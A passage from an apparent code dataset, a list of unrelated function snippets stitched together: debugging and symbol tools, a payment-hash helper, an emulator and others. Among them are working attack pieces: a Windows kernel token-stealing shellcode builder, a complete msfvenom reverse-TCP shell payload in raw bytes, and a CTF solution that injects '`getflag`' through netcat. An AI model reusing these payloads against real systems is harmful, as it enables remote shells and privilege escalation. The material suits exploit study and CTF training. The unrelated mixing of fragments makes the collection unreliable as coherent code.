320);\n mydump(\"private_key\", buf, 320);\n\n // Decrypt public key\n char buf2[4096] = {0};\n wb_decrypt_key(ciphertext2, buf2, 272);\n mydump(\"public_key\", buf2, 272);\n\n return 0;\n }\n \"\"\"\n\n return ccode", "def dump_core(self):\n raise AssertionError(\"Core Dump function not implemented\")", "def kill_android():\r\n try:\r\n if androids[0]:\r\n androids[0] = None\r\n if androids[1]:\r\n androids[0] = androids[1]\r\n except IndexError:\r\n print \"index error\"", "def getPhases():", "def getScramArch(self):\n return self[\"SCRAM_ARCH\"]", "def patch_sdk():", "def patch_sdk():", "def 
patch_sdk():", "def test_patch_pci_switch(self):\n pass", "def is_source_prefix_mangled(self):\n return False", "def unusedFromKDOTDataPreparation():", "def disarm(self):\n pass", "def test_universal64_executable(self):\n self.build(debug_info=\"dsym\")\n self.do_test()", "def test_universal64_executable(self):\n self.build(debug_info=\"dsym\")\n self.do_test()", "def test_amd64(self):\n self.do_test(\"1lwp_SIGSEGV.amd64\", pid=693, region_count=21)", "def RunSymbolizer(input_file, output_file, build_ids_files):\n\n symbolizer = GetHostToolPathFromPlatform('symbolizer')\n symbolizer_cmd = [\n symbolizer, '--build-id-dir',\n os.path.join(SDK_ROOT, '.build-id')\n ]\n for build_ids_file in build_ids_files:\n symbolizer_cmd.extend(['--ids-txt', build_ids_file])\n\n logging.info('Running \"%s\".' % ' '.join(symbolizer_cmd))\n return subprocess.Popen(symbolizer_cmd, stdin=input_file, stdout=output_file,\n stderr=subprocess.STDOUT, close_fds=True)", "def _c_optimizations_ignored():\n pure_env = os.environ.get('PURE_PYTHON')\n return pure_env != \"0\" if pure_env is not None else PYPY", "def split_debug(src, objcopy=None, objdump=None):\n if objcopy is None:\n objcopy = \"objcopy\"\n if objdump is None:\n objdump = \"objdump\"\n if not contains_debug_info(src, objdump=objdump):\n ui.info(\"-- Already stripped\", src)\n return\n src_stat = os.stat(src)\n dirname, basename = os.path.split(src)\n debug_dir = os.path.join(dirname, \".debug\")\n qisys.sh.mkdir(debug_dir)\n dest = os.path.join(src, debug_dir, basename)\n to_run = list()\n to_run.append([objcopy, \"--only-keep-debug\", src, dest])\n to_run.append([objcopy,\n \"--strip-debug\",\n \"--strip-unneeded\",\n \"--add-gnu-debuglink=%s\" % dest,\n src])\n try:\n for cmd in to_run:\n qisys.command.check_output(cmd, stderr=subprocess.STDOUT)\n ui.info(\"-- Debug info extracted for\", src)\n except qisys.command.CommandFailedException as e:\n ui.error(\"Error while Extracting package debug for %s\" % src)\n ui.error(str(e))\n # After the commands have run, utime of the file has changed, causing\n # cmake to re-install the libraries. 
Which is not cool ...\n # So set back mtime to its previous value:\n os.utime(src, (src_stat.st_atime, src_stat.st_mtime))", "def reverseLocalFonctionPointerNames(context):\n fsave = context.config.getCacheFilename(\n context.config.CACHE_FUNCTION_NAMES,\n context.dumpname)\n if os.access(fsave, os.F_OK):\n vtable = pickle.load(file(fsave, 'rb'))\n for x in vtable.items():\n yield x\n raise StopIteration\n\n IGNORES = ['None', '[heap]', '[stack]', '[vdso]']\n\n # XXX this is not portable.\n libdl = ctypes.CDLL('libdl.so')\n\n def getname(fnaddr):\n info = Dl_info()\n ret = libdl.dladdr(fnaddr, ctypes.byref(info))\n return info.dli_sname.string, info.dli_saddr\n\n mappings = context.mappings\n ldso = dict()\n for m in mappings:\n if m.pathname not in IGNORES and m.pathname not in ldso:\n try:\n ldso[m.pathname] = ctypes.CDLL(m.pathname)\n except OSError as e:\n IGNORES.append(m.pathname)\n\n # looking in [heap] pointing to elsewhere\n all_ptrs = context.listPointerValueInHeap()\n log.debug('[+] %d pointers in heap to elsewhere ' % (len(all_ptrs)))\n\n localmappings = getMappings()\n vtable = dict()\n\n for ptr in set(all_ptrs):\n # get dump mmap\n m = mappings.get_mapping_for_address(ptr)\n if m.pathname not in IGNORES:\n # find the right localmmap\n localmaps = localmappings._get_mapping(m.pathname)\n found = False\n for localm in localmaps:\n if localm.offset == m.offset and localm.permissions == m.permissions:\n # found it\n found = True\n caddr = ptr - m.start + localm.start # rebase\n dl_name, fnaddr = getname(caddr)\n if dl_name is not None:\n if fnaddr == caddr: # reverse check\n log.debug('[+] REBASE 0x%x -> 0x%x p:%s|%s|=%s off:%x|%x|=%s %s fn: %s @%x' % (\n ptr, caddr, m.permissions, localm.permissions, localm.permissions == m.permissions,\n m.offset, localm.offset, m.offset == localm.offset, m.pathname, dl_name, fnaddr))\n vtable[ptr] = dl_name\n yield (ptr, dl_name)\n else:\n continue\n print('[-] MIDDLE 0x%x -> 0x%x p:%s|%s|=%s off:%x|%x|=%s %s fn: %s @%x' % (\n ptr, caddr, m.permissions, localm.permissions, localm.permissions == m.permissions,\n m.offset, localm.offset, m.offset == localm.offset, m.pathname, dl_name, fnaddr))\n else:\n continue\n print('FAIL REBASE (not public ?) 
0x%x -> 0x%x p:%s|%s|=%s off:%x|%x|=%s %s fn: %s ' % (\n ptr, caddr, m.permissions, localm.permissions, localm.permissions == m.permissions,\n m.offset, localm.offset, m.offset == localm.offset, m.pathname, dl_name))\n pass\n break\n if not found:\n continue\n print('[+] not a fn pointer %x\\n' % (ptr), m, '\\n ---dump Vs local ---- \\n',\n '\\n'.join(map(str, localmaps)))\n # pass\n for name, lib in ldso.items():\n ret = libdl.dlclose(lib._handle)\n\n import pickle\n pickle.dump(vtable, file(fsave, 'wb'))\n\n raise StopIteration", "def generate_payu_hash_android(data):\n hash_keys = ('txnid', 'amount', 'productinfo', 'firstname', 'email', 'udf1', 'udf2', 'udf3', 'udf4', 'udf5')\n\n hashes = {}\n pkey = config('PAYU_KEY')\n salt = config('PAYU_SALT')\n\n value = pkey\n for key in hash_keys:\n value += \"{}{}\".format('|', data.get(key, ''))\n\n value += \"{}{}\".format('||||||', salt)\n hashes['payment_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnNameMerchantCodes = 'get_merchant_ibibo_codes'\n value = pkey + '|' + cmnNameMerchantCodes + '|default|' + salt\n hashes['get_merchant_ibibo_codes_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnMobileSdk = 'vas_for_mobile_sdk'\n value = pkey + '|' + cmnMobileSdk + '|default|' + salt\n hashes['vas_for_mobile_sdk_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnEmiAmountAccordingToInterest = 'getEmiAmountAccordingToInterest'\n value = pkey + '|' + cmnEmiAmountAccordingToInterest + '|' + str(data.get('amount', '')) + '|' + salt\n hashes['emi_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnPaymentRelatedDetailsForMobileSdk1 = 'payment_related_details_for_mobile_sdk'\n value = pkey + '|' + cmnPaymentRelatedDetailsForMobileSdk1 + '|default|' + salt\n hashes['payment_related_details_for_mobile_sdk_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnVerifyPayment = 'verify_payment'\n value = pkey + '|' + cmnVerifyPayment + '|' + data.get('txnid', '') + '|' + salt\n hashes['verify_payment_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n if data.get('user_credentials'):\n cmnNameDeleteCard = 'delete_user_card'\n value = pkey + '|' + cmnNameDeleteCard + '|' + data['user_credentials'] + '|' + salt\n hashes['delete_user_card_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnNameGetUserCard = 'get_user_cards'\n value = pkey + '|' + cmnNameGetUserCard + '|' + data['user_credentials'] + '|' + salt\n hashes['get_user_cards_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnNameEditUserCard = 'edit_user_card'\n value = pkey + '|' + cmnNameEditUserCard + '|' + data['user_credentials'] + '|' + salt\n hashes['edit_user_card_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnNameSaveUserCard = 'save_user_card'\n value = pkey + '|' + cmnNameSaveUserCard + '|' + data['user_credentials'] + '|' + salt\n hashes['save_user_card_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnPaymentRelatedDetailsForMobileSdk = 'payment_related_details_for_mobile_sdk'\n value = pkey + '|' + cmnPaymentRelatedDetailsForMobileSdk + '|' + data['user_credentials'] + '|' + salt\n hashes['payment_related_details_for_mobile_sdk_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n if data.get('udf3'):\n cmnSend_Sms = 'send_sms'\n value = pkey + '|' + cmnSend_Sms + '|' + data['udf3'] + '|' + salt\n hashes['send_sms_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n if data.get('offerKey'):\n cmnCheckOfferStatus = 
'check_offer_status'\n value = pkey + '|' + cmnCheckOfferStatus + '|' + data['offerKey'] + '|' + salt\n hashes['check_offer_status_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n if data.get('cardBin'):\n cmnCheckIsDomestic = 'check_isDomestic'\n value = pkey + '|' + cmnCheckIsDomestic + '|' + data['cardBin'] + '|' + salt\n hashes['check_isDomestic_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n return hashes", "def freeze(self):\r\n\r\n # this code is probably rather ickier than it needs to be!\r\n for i in range(len(self.data)):\r\n e = self.data[i]\r\n if not isinstance(e.code, str):\r\n self.data[i] = type(e)((label(e.code),) + e[1:])\r\n if e.calls:\r\n for j in range(len(e.calls)):\r\n se = e.calls[j]\r\n if not isinstance(se.code, str):\r\n e.calls[j] = type(se)((label(se.code),) + se[1:])", "def compact_style_code():\n try: raise Exception # NOQA\n except Exception: pass # NOQA", "def _draw_mash(base_symbol: str, ds_symbol: int) -> Tuple[str, str]:\n id_to_name = {\n 0: 'circle',\n 1: 'square',\n 2: 'diamond',\n 3: 'cross',\n 4: 'x',\n 5: '\"triangle-up\"',\n 6: '\"triangle-down\"',\n 7: '\"triangle-left\"',\n 8: '\"triangle-right\"',\n 9: '\"triangle-ne\"',\n 10: '\"triangle-se\"',\n 11: '\"triangle-sw\"',\n 12: '\"triangle-nw\"',\n 13: 'pentagon',\n 14: 'hexagon',\n 15: 'hexagon2',\n 16: 'octagon',\n 17: 'star',\n 18: 'hexagram',\n 19: '\"star-triangle-up\"',\n 20: '\"star-triangle-down\"',\n 21: '\"star-square\"',\n 22: '\"star-diamond\"',\n 23: '\"diamond-tall\"',\n 24: '\"diamond-wide\"',\n 25: 'hourglass',\n 26: 'bowtie',\n 27: '\"circle-cross\"',\n 28: '\"circle-x\"',\n 29: '\"square-cross\"',\n 30: '\"square-x\"',\n 31: '\"diamond-cross\"',\n 32: '\"diamond-x\"',\n 33: '\"cross-thin\"',\n 34: '\"x-thin\"',\n 35: 'asterisk',\n 36: 'hash',\n 37: '\"y-up\"',\n 38: '\"y-down\"',\n 39: '\"y-left\"',\n 40: '\"y-right\"',\n 41: '\"line-ew\"',\n 42: '\"line-ns\"',\n 43: '\"line-ne\"',\n 44: '\"line-nw\"',\n 45: '\"arrow-up\"',\n 46: '\"arrow-down\"',\n 47: '\"arrow-left\"',\n 48: '\"arrow-right\"',\n 49: '\"arrow-bar-up\"',\n 50: '\"arrow-bar-down\"',\n 51: '\"arrow-bar-left\"',\n 52: '\"arrow-bar-right\"'\n }\n mash_id = _symbol_mash(base_symbol, ds_symbol)\n mash_name = id_to_name[mash_id]\n target_str = mash_name + r':{n.*?}(,needLine:!0)?(,noDot:!0)?(,noFill:!0)?}'\n swap_str = mash_name + r':{n:' + str(mash_id) + ',f:function(t){' + _get_vars(base_symbol) + _get_vars(\n ds_symbol) + f'return{_get_paths(ds_symbol)}+{_get_paths(base_symbol)};' + '}}'\n return target_str, swap_str", "def tokenstealingx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x60\"\t\t\t\t\t\t\t\t\t\t# pushad\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\xc8\"\t\t\t\t\t\t\t\t\t# mov\tecx,eax\n\t\"\\x8b\\x80\" + APLINKS + \"\\x00\\x00\\x00\"\t\t# mov\teax,DWORD PTR [eax+0xb8]\n\t\"\\x2d\" + APLINKS + \"\\x00\\x00\\x00\"\t\t\t# sub\teax,0xb8\n\t\"\\x83\\xb8\" + UPID + \"\\x00\\x00\\x00\\x04\"\t\t# cmp\tDWORD PTR [eax+0xb4],0x4\n\t\"\\x75\\xec\"\t\t\t\t\t\t\t\t\t# jne\t0xe\n\t\"\\x8b\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x89\\x91\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tDWORD PTR [ecx+0xf8],edx\n\t\"\\x61\"\t\t\t\t\t\t\t\t\t\t# popad\n\t)\n\t\n\tshellcode += extra #append extra code after token 
stealing shellcode, e.g.: restore stack\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def _ExtractPragmas(self, input_line, input_lines, output_stream):\n for line in input_lines[input_line - 1:]:\n pragma_match = constants.PRAGMA_RE.match(line)\n if not pragma_match:\n # Found all the pragmas.\n break\n\n # Found a pragma, strip it and pass it to the handler.\n pragma_type, pragma_value = pragma_match.groups()\n\n self._pragma_handler.HandlePragma(\n input_line,\n output_stream,\n pragma_type.strip(),\n pragma_value.strip())\n\n # Moving on to the next line.\n input_line += 1\n\n return input_line", "def test_llvm_objcopy(self):\n self.assertEqual(\n self.ndk.llvm_objcopy,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin/llvm-objcopy\",\n )", "def set_mangling(self):\n # This one generates a program equivalent to that in BLACS/INSTALL\n # that checks the mangling in FORTRAN function symbols\n print 'Setting Fortran mangling...',\n sys.stdout.flush()\n writefile('tmpf.f',\"\"\"\n program intface\n external c_intface\n integer i\n call c_intface(i)\n stop\n end\\n\"\"\")\n writefile('tmpc.c',\"\"\"\n #include <stdio.h>\n void c_intface_(int *i){fprintf(stdout, \\\"-DADD_\\\");fflush(stdout);}\n void c_intface(int *i){fprintf(stdout, \\\"-DNOCHANGE\\\");fflush(stdout);}\n void c_intface__(int *i){fprintf(stdout, \\\"-DfcIsF2C\\\");fflush(stdout);}\n void C_INTFACE(int *i){fprintf(stdout, \\\"-DUPCASE\\\");fflush(stdout);}\\n\"\"\")\n\n ccomm = self.config.cc+' '+self.config.ccflags+' -c tmpc.c -o tmpc.o'\n fcomm = self.config.fc+' '+self.config.fcflags+' '+self.config.ldflags_fc+' tmpf.f tmpc.o -o xintface'\n\n (output, error, retz) = runShellCommand(ccomm)\n if retz:\n print '\\n\\nCOMMON: in set_mangling: cannot compile'\n print 'error is:\\n','*'*40,'\\n',error,'\\n','*'*40\n sys.exit()\n\n (output, error, retz) = runShellCommand(fcomm)\n if retz:\n print '\\n\\nCOMMON: in set_mangling: cannot compile'\n print 'error is:\\n','*'*40,'\\n',error,'\\n','*'*40\n sys.exit()\n\n comm = os.path.join(os.getcwd(),'xintface')\n (output, error, retz) = runShellCommand(comm)\n if retz:\n print '\\n\\nCOMMON: in set_mangling: cannot run xintface'\n print 'error is:\\n','*'*40,'\\n',error,'\\n','*'*40\n sys.exit()\n\n self.mangling = output\n killfiles(['xintface', 'tmpf.f', 'tmpf.o', 'tmpc.c', 'tmpc.o'])\n\n print self.mangling\n return 1;", "def postprocess_symbols(config: Config, symbols: SymbolDF) -> SymbolDF:\n files = []\n arms = []\n arm_symbols = {}\n current_file = ''\n current_arm = ''\n has_file = False\n if config['collect.prefix-file']:\n prefixes = config.get_re('collect.prefix')\n else:\n prefixes = None\n if 'type' in symbols.columns:\n for symbol in symbols.itertuples():\n if symbol.type == 'FILE':\n has_file = True\n current_file = symbol.symbol\n if prefixes:\n current_file = simplify_source(current_file, prefixes)\n\n elif symbol.type == 'NOTYPE':\n if symbol.symbol.startswith('$'):\n if current_arm or symbol.symbol in ARM_SPECIAL_SYMBOLS:\n current_arm = symbol.symbol\n arm_symbols[current_arm] = True\n files.append(current_file)\n arms.append(current_arm)\n\n if has_file:\n symbols['file'] = files\n if current_arm:\n symbols['arm'] = arms\n\n if has_file:\n symbols = symbols[symbols['type'] != 'FILE']\n if current_arm:\n syms = arm_symbols.keys()\n symbols = symbols[~symbols.symbol.isin(syms)]\n return symbols", "def 
__init__(self):\n self.reg = 8 * [0]\n self.ram = 256 * [0]\n self.reg[7] = 0xF4\n self.pc = 0 \n self.fl = 0b00000000\n self.fl_status = {\n \"L\": 0b00000100,\n \"G\": 0b00000010,\n \"E\": 0b00000001,\n } \n self.running = True \n self.opcodes = {\n \"NOP\": 0b00000000,\n \"LDI\": 0b10000010,\n \"PRN\": 0b01000111,\n \"ADD\": 0b10100000,\n \"MUL\": 0b10100010,\n \"HLT\": 0b00000001,\n \"PUSH\": 0b01000101,\n \"POP\": 0b01000110,\n \"CALL\": 0b01010000,\n \"RET\": 0b00010001,\n \"CMP\": 0b10100111,\n \"JMP\": 0b01010100,\n \"JEQ\": 0b01010101,\n \"JNE\": 0b01010110,\n }\n self.branch_table = {}\n self.branch_table[self.opcodes['LDI']] = self.ldi\n self.branch_table[self.opcodes['PRN']] = self.prn\n self.branch_table[self.opcodes['HLT']] = self.hlt\n self.branch_table[self.opcodes['MUL']] = self.mul\n self.branch_table[self.opcodes['PUSH']] = self.push\n self.branch_table[self.opcodes['POP']] = self.pop\n self.branch_table[self.opcodes['CALL']] = self.call\n self.branch_table[self.opcodes['RET']] = self.ret\n self.branch_table[self.opcodes['ADD']] = self.add\n self.branch_table[self.opcodes['CMP']] = self.cmp\n self.branch_table[self.opcodes['JMP']] = self.jmp\n self.branch_table[self.opcodes['JEQ']] = self.jeq\n self.branch_table[self.opcodes['JNE']] = self.jne", "def signals():\n sigdict = {'SIGABRT':'should cause (graceful) daemon exit', 'SIGCONT':'should cause daemon resume/continue after SIGHUP',\n 'SIGHUP':'should suspend/pause daemon', 'SIGINT':'should cause (graceful) daemon exit',\n 'SIGTERM':'should cause (graceful) daemon exit'}\n signal.signal(signal.SIGABRT, sighandler) \n signal.signal(signal.SIGCONT, sighandler)\n signal.signal(signal.SIGHUP, sighandler)\n signal.signal(signal.SIGINT, sighandler)\n signal.signal(signal.SIGTERM, sighandler)\n# signal.signal(signal.SIGTSTP, sighandler) ignore this for now to allow shell jobs\n# print >> FileKeyUtils.WMSlog, sigdict\n return sigdict", "def _unpack_stdlib(self):\n output_dir = self.manager.output_dir\n\n with tempfile.TemporaryDirectory() as td:\n tdp = Path(td)\n self.extract_one(self.app_archive, tdp)\n self.copy_one(tdp / \"package\", output_dir)\n\n self.maybe_timestamp(output_dir)", "def find_all_landroid_ljava_over(smali_file_list):\r\n for smali_file in smali_file_list: # For each file\r\n for smali_line in u.open_file_input(smali_file): # For each line\r\n class_match = re.search(r'^([ ]*?)\\.class(.*?)(?P<className>L([^;]*?);)', smali_line) # Match the class definition\r\n if class_match is not None:\r\n class_name = class_match.group('className') # Recover the class name\r\n if re.search(r'Landroid|Ljava', class_name): # If the class is a subclass of an SDK class\r\n yield class_name # Return the class name\r\n print smali_line, # Print back the line unchanged\r", "def __init__(__self__, *,\n other_native_crash: bool):\n pulumi.set(__self__, \"other_native_crash\", other_native_crash)", "def core_dump(self):\r\r\n loggerModem = logging.getLogger(__name__ + 'core_dump')\r\r\n cmd_l=[r'at%debug=0', r'at%debug=2']\r\r\n cmd_str='\\r\\n'.join(cmd_l)\r\r\n\r\r\n text_str = \"AT command\"\r\r\n if self.dumpfile:\r\r\n loggerModem.debug(\"Core file : %s\" % self.dumpfile)\r\r\n loggerModem.debug(\"%-15s:\\t%s\" %(text_str, cmd_str))\r\r\n with open(self.dumpfile, 'wb') as fd:\r\r\n cmd_str = cmd_str + '\\r\\n'\r\r\n self.serObj.write(cmd_str) # write a string\r\r\n len_rd=0\r\r\n response = self.serObj.read(2**16)\r\r\n while len(response)>0:\r\r\n len_rd += len(response)\r\r\n loggerModem.debug(\"read %s bytes, 
current_len=%s\" % (len(response), len_rd))\r\r\n fd.write(response)\r\r\n response = self.serObj.read(2**16)\r\r\n loggerModem.info(\"Created core dump: %s\" % self.dumpfile)\r\r\n else:\r\r\n loggerModem.info(\"No core dump as no dump file specified!\")", "def _decompile(*args):\n return _ida_hexrays._decompile(*args)", "def disassemble(self, script):\n return ' '.join(self.opcode_list(script))", "def do_before_dump(self):\n self.checksummer.prepare_checksums()", "def _getOldCodeList(self, line):\n if line.startswith('+'):\n return (None, self.color)\n if line.startswith('-'):\n return (' ' + line[1:], self.color)\n return (line, self.color)", "def find_all_landroid_ljava_over(smali_file_list):\n for smali_file in smali_file_list: # For each file\n for smali_line in u.open_file_input(smali_file): # For each line\n class_match = re.search(r'^([ ]*?)\\.class(.*?)(?P<className>L([^;]*?);)', smali_line) # Match the class definition\n if class_match is not None:\n class_name = class_match.group('className') # Recover the class name\n if re.search(r'Landroid|Ljava', class_name): # If the class is a subclass of an SDK class\n yield class_name # Return the class name\n print smali_line, # Print back the line unchanged", "def pybind11(self, line, cell):\n\n line = line.strip().rstrip(';')\n args = self.pybind11.parser.parse_args(shlex.split(line))\n code = self.format_code(cell)\n module = 'pybind11_{}'.format(self.compute_hash(code, args))\n libfile = cache_path(module + ext_suffix())\n need_rebuild = not os.path.isfile(libfile) or args.force\n if need_rebuild:\n source = self.save_source(code, module)\n self.build_module(module, source, args)\n self.import_module(module, libfile, import_symbols=not args.module)", "def code():", "def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += 
b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode", "def dump_from_release(input_bytes, key):\n idx = 0\n while True:\n idx = input_bytes.find(LINUX_BANNER_PREFIX, idx)\n if idx < 0:\n return None\n\n value = get_from_release(input_bytes, idx, key)\n if value:\n return value.encode()\n\n idx += len(LINUX_BANNER_PREFIX)", "def solve_level11(_, snow_crash):\n\n proc = snow_crash.process([\"/bin/nc\", \"localhost\", \"5151\"])\n proc.sendline(\"`getflag` > /tmp/token11\")\n output = snow_crash[\"cat /tmp/token11; rm -f /tmp/token11\"]\n return \"token\", u.misc.parse_token(output)", "def _find_processing_instructions(self):\n pass", "def reset_graphics_dumpsys(device, package_name):\n print 'Clearing gfxinfo on device'\n device.shell('dumpsys gfxinfo ' + package_name + ' reset')", "def _platform_compatible():\r\n raise NotImplementedError", "def testPullMinidumpsLockFilesIgnored(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n platform_backend = self._browser_backend.platform_backend\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n remote_dump_file = posixpath.join(remote_path, 'test_dump')\n remote_lock_file = posixpath.join(remote_path, 'test_file.lock')\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_dump_file])\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_lock_file])\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_dump')\n self.assertTrue(os.path.exists(local_path))\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_file.lock')\n self.assertFalse(os.path.exists(local_path))", "def visit_Python(self, node):\n # This compiles the given Python ast into a Python code object\n # then disassembles it into a byteplay code object. This allows\n # us to interleave the instructions with those generated for\n # the rest of the module and then compile a single unified \n # code object.\n py_code = compile(node.py_ast, self.filename, mode='exec')\n bpc = Code.from_code(py_code)\n # Skip the SetLineo and ReturnValue codes\n self.code_ops.extend(bpc.code[1:-2])", "def _DisassembleFunc(self, symbol, elf_path=None, use_pager=None,\n to_file=None):\n assert not symbol.IsGroup()\n assert symbol.address and symbol.section_name == models.SECTION_TEXT\n assert not symbol.IsDelta(), ('Cannot disasseble a Diff\\'ed symbol. 
Try '\n 'passing .before_symbol or .after_symbol.')\n size_info = self._SizeInfoForSymbol(symbol)\n container = symbol.container\n elf_path = self._ElfPathForSymbol(size_info, container, elf_path)\n # Always use Android NDK's objdump because llvm-objdump does not print\n # the target of jump instructions, which is really useful.\n output_directory_finder = self._output_directory_finder\n if not output_directory_finder.Tentative():\n output_directory_finder = path_util.OutputDirectoryFinder(\n any_path_within_output_directory=elf_path)\n if output_directory_finder.Tentative():\n # Running objdump from an output directory means that objdump can\n # interleave source file lines in the disassembly.\n objdump_pwd = output_directory_finder.Finalized()\n else:\n # If we do not know/guess the output directory, run from any directory 2\n # levels below src since it is better than a random cwd (because usually\n # source file paths are relative to an output directory two levels below\n # src and start with ../../).\n objdump_pwd = path_util.FromToolsSrcRoot('tools', 'binary_size')\n\n arch = readelf.ArchFromElf(elf_path)\n objdump_path = path_util.GetDisassembleObjDumpPath(arch)\n args = [\n os.path.relpath(objdump_path, objdump_pwd),\n '--disassemble',\n '--source',\n '--line-numbers',\n '--demangle',\n '--start-address=0x%x' % symbol.address,\n '--stop-address=0x%x' % symbol.end_address,\n os.path.relpath(elf_path, objdump_pwd),\n ]\n\n # pylint: disable=unexpected-keyword-arg\n proc = subprocess.Popen(args,\n stdout=subprocess.PIPE,\n encoding='utf-8',\n cwd=objdump_pwd)\n lines = itertools.chain(('Showing disassembly for %r' % symbol,\n 'Command: %s' % ' '.join(args)),\n (l.rstrip() for l in proc.stdout))\n _WriteToStream(lines, use_pager=use_pager, to_file=to_file)\n proc.kill()", "def 